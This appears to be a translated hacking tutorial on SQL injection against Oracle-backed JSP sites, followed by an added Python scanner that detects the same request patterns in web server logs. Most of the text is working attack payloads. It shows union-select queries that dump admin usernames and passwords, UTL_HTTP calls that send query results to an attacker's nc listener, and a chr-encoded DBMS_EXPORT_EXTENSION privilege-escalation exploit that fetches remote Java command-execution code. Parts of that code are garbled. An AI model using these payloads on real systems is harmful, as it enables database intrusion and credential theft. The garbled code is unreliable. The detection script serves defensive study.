Oracle injection Learning

Source: Internet
Author: User

Taskkill.net

We all know that Oracle is a large product: the 11g installer alone is around a gigabyte. You will run into Oracle databases less often, and when you do it is usually in an Oracle + JSP combination...
The default users of an Oracle database include sys, system, internal and scott; the first three carry system privileges.
A word on comment syntax: Access supports null and %00 comments; MSSQL supports -- and ;; MySQL supports /*; Oracle supports --.
So if MSSQL has been ruled out, how do we tell an Oracle database from an MSSQL one? If it is Oracle, errors show up readily, typically as ODBC errors on statements such as stored procedure calls; you can also submit ; and user()>0 to confirm MSSQL and thereby rule out Oracle.
Injection:
Method 1: the dual system table
1. Determine whether injection is possible. Numeric: and 1=1 / and 1=0. Between: and 1=1 / and 1=0. Search: xx% and 1=1 and %=xx% / xx% and 1=2 and %=xx% (xx must be a string that exists on the page). Text type: url%2B returns the normal page, url%2Basdfg returns an error (asdfg is a random string).
2. Determine the column count: union select null, null, null ... (null is used instead of 1, 2, 3 to avoid type mismatches; once the count is confirmed, replace the nulls with typed values one by one, because Oracle does not convert types automatically). order by also works.
3. Determine whether the dual table exists. (This article injects through the dual table; if it does not exist and the tools do not work, it becomes manual labor.) url and exists (select * from dual)
4. Injection example. Assume www.abc.com/abc.jsp?Id=1 is injectable, with seven columns that are all integers, and the column displayed on the page is position 2.
1. Determine the Oracle version: www.abc.com/abc.jsp?Id=1 and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),3,4,5,6,7 from dual
2. Determine the currently connected user: www.abc.com/abc.jsp?Id=1 and 1=2 union select 1,(select sys_context('userenv','current_user') from dual),3,4,5,6,7 from dual
3. Enumerate tables: www.abc.com/abc.jsp?Id=1 and 1=2 union select 1,table_name,3,4,5,6,7 from user_tables. There may be many tables, so the displayed column needs enough length; in some cases tables are not shown because the length is insufficient. Assume an admin table exists.
4. Enumerate its columns: www.abc.com/abc.jsp?Id=1 and 1=2 union select 1,column_name,3,4,5,6,7 from cols where table_name='admin' (assume the columns are username and password)
5. Read the column contents: www.abc.com/abc.jsp?Id=1 and 1=2 union select 1,username,3,4,5,6,7 from admin and www.abc.com/abc.jsp?Id=1 and 1=2 union select 1,password,3,4,5,6,7 from admin. concat() can also be used to return both at once.

Method 2: the UTL_HTTP stored procedure
To check whether the UTL_HTTP package exists, use the statement select count(*) from all_objects where object_name='UTL_HTTP'. Since the information is returned out-of-band (the database server makes an HTTP request back to us), we first listen locally with nc and then submit and UTL_HTTP.request('http://IP:2009/'||(query statement))=1.
First run nc -l -vv -p 2009 locally, then submit "and UTL_HTTP.request('http://IP:2009/'||(select banner from sys.v_$version where rownum=1))=1 --"
The listener receives the database version. Now we enumerate bit by bit: first the schemas, then the tables, then the columns (the columns above were already determined to be USERNAME and PASSWORD), and finally the column values. To enumerate the schemas, submit
"and UTL_HTTP.request('http://IP:2009/'||(select owner from all_tables where rownum=1))=1 --"
Suppose the first schema returned is SYS. To get the second one, submit
"and UTL_HTTP.request('http://IP:2009/'||(select owner from all_tables where owner<>'SYS' and rownum=1))=1 --" and so on, until all schemas are listed.
The statements for enumerating tables are as follows. Submit
"and UTL_HTTP.request('http://IP:2009/'||(select TABLE_NAME from all_tables where owner='SYS' and rownum=1))=1 --"
Suppose the first table in the SYS schema is xxx. Continue with
"and UTL_HTTP.request('http://IP:2009/'||(select TABLE_NAME from all_tables where owner='SYS' and rownum=1 and TABLE_NAME<>'xxx'))=1 --"
and in this way all tables in the SYS schema are listed. To find the number of columns in a table, use
"and UTL_HTTP.request('http://IP:2009/'||(select count(*) from user_tab_columns where table_name='<table name>'))=1 --"
To get the first column name, use
"and UTL_HTTP.request('http://IP:2009/'||(select * from user_tab_columns where table_name='<table name>' and rownum=1))=1 --"
For the second column name:
"and UTL_HTTP.request('http://IP:2009/'||(select * from user_tab_columns where table_name='<table name>' and rownum=1 and COLUMN_NAME<>'<first column name>'))=1 --"
and so on. Now continue with the user name and password. Submit
"and UTL_HTTP.request('http://IP:2009/'||(select <column name 1> from TBL_USER_MANAGER_BASE where rownum=1))=1 --"
and for the password submit
"and UTL_HTTP.request('http://IP:2009/'||(select PASSWORD from TBL_USER_MANAGER_BASE where rownum=1))=1 --"
The first thing that comes to mind is the SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES function, which can be used through web injection to obtain system privileges directly. Its usage is as follows.
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); [multi-statement] END; --, SYS, 0, 1, 0)
Our exploit is written as multiple statements, but that makes the statement we construct very long. So instead we use utl_http.request to fetch the exploit placed on a remote host. The statement is constructed as follows.
"and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(FOO, BAR, DBMS_OUTPUT".PUT(:P1); utl_http.request(http://www.li-tek.com/1.txt) END; --, SYS, 0, 1) = 0 --"
However, the page cannot be displayed after submission. And SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (chr (39) | chr (70) | chr (79), chr (79) | chr (39) | chr (44), chr (39) | chr (66) | chr (65) | chr (82) | chr (39) | chr (44) | chr (39) | chr (68) | chr (66) | chr (77) | chr (883) | chr (95) | chr (79) | chr (85) | chr (84) | chr (80) | chr (85) | chr (84) | chr (40) | chr (58) | chr (80) | chr (49)
| Chr (41) | chr (59) | utl_http.request (chr (39) | chr (104) | chr (116) | chr (116) | chr (112) | chr (58) | chr (47) | chr (47) | chr (119) | chr (119) | chr (119) | chr (46) | chr (108) | chr (105) | chr (45) | chr (116) | chr (101) | chr (107) | chr (46) | chr (99) | chr (111) | chr (109) | chr (47) | chr (49) | chr (46) | chr (116) | chr (120) | chr (116) | chr (39) | chr (69) | chr (78) | chr (68) | chr (59) | chr (45) | chr (45) | chr (39), chr (39) | chr (83) | chr (89) | chr (83) | chr (39), 0, chr (39) | chr (49) | chr (39), 0) = 0 --
The content of the remote file 1.txt is:
Execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace and resolve java source named "JAVACMD" AS import java. lang. *; import java. io. *; public class JAVACMD {public static void execCommand (String command) throws IOException extends runtime.getruntime(cmd.exe c (command) ;};; END;
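
From the defender's side, the requests above leave a very recognizable trail in the web server access log. As an added example (not from the original article), here is a Python scanner that flags the Oracle-specific patterns this page walks through: boolean probes, UNION ... FROM dual enumeration, v_$version lookups, UTL_HTTP.request out-of-band calls, DBMS_EXPORT_EXTENSION references and chr()-encoded payloads. The log lines, client addresses and the /abc.jsp application are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the request patterns described on this page. They are matched
# against a URL-decoded, lower-cased, space-collapsed copy of the query string,
# so the regexes can use single spaces instead of \s+ everywhere.
ORACLE_SQLI_RULES = [
    ("boolean-probe", r"\band 1 ?= ?[012]\b"),
    ("union-column-probe", r"\bunion (all )?select\b"),
    ("dual-table", r"\bfrom dual\b"),
    ("schema-enumeration", r"\b(user_tables|all_tables|user_tab_columns|cols|all_objects)\b"),
    ("version-probe", r"v_\$version"),
    ("oob-utl_http", r"\butl_http\.request\b"),
    ("privesc-dbms_export_extension", r"\bdbms_export_extension\b"),
    ("chr-obfuscation", r"(chr ?\(\d+\) ?(\|\|? ?)?){3,}"),
]

# Combined log format (Apache/Nginx); the request target is what gets inspected.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (hypothetical /abc.jsp app, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2009:10:01:02 +0800] "GET /abc.jsp?Id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Apr/2009:10:01:09 +0800] "GET /abc.jsp?Id=1%20and%201=2%20union%20select%201,(select%20banner%20from%20sys.v_$version%20where%20rownum=1),3,4,5,6,7%20from%20dual HTTP/1.1" 200 5210',
    '198.51.100.7 - - [10/Apr/2009:10:02:31 +0800] "GET /abc.jsp?Id=1%20and%20UTL_HTTP.request(\'http://203.0.113.5:2009/\'||(select%20owner%20from%20all_tables%20where%20rownum=1))=1-- HTTP/1.1" 500 312',
    '203.0.113.9 - - [10/Apr/2009:10:03:00 +0800] "GET /search.jsp?q=oracle+and+mysql HTTP/1.1" 200 2048',
]

def normalize_query(target):
    """Decode the query string twice (defeats double encoding), lower-case it, collapse whitespace."""
    decoded = unquote_plus(unquote_plus(urlsplit(target).query))
    return re.sub(r"\s+", " ", decoded).strip().lower()

def classify_query(target):
    """Return the names of every rule the request target trips (empty list if clean)."""
    q = normalize_query(target)
    return [name for name, pattern in ORACLE_SQLI_RULES if re.search(pattern, q)]

def scan_access_log(lines):
    """Return (client_ip, target, matched_rules) for each suspicious request, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        rules = classify_query(m.group("target")) if m else []
        if rules:
            hits.append((m.group("ip"), m.group("target"), rules))
    return hits
```

Running scan_access_log(SAMPLE_LOG) flags only the second and third requests; the benign search whose keyword happens to contain "and" is not flagged, because the boolean rule requires the "and 1=" shape.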

You may have noticed that the injection statements used in the second method, with the UTL_HTTP stored procedure, are basically the same as those used with the dual table.
The first method was explained in the first issue of Black Hand.

The second method, using the UTL_HTTP stored procedure, is illustrated with clear pictures in the reference article:

http://www.bkjia.com/Article/200904/37078.html
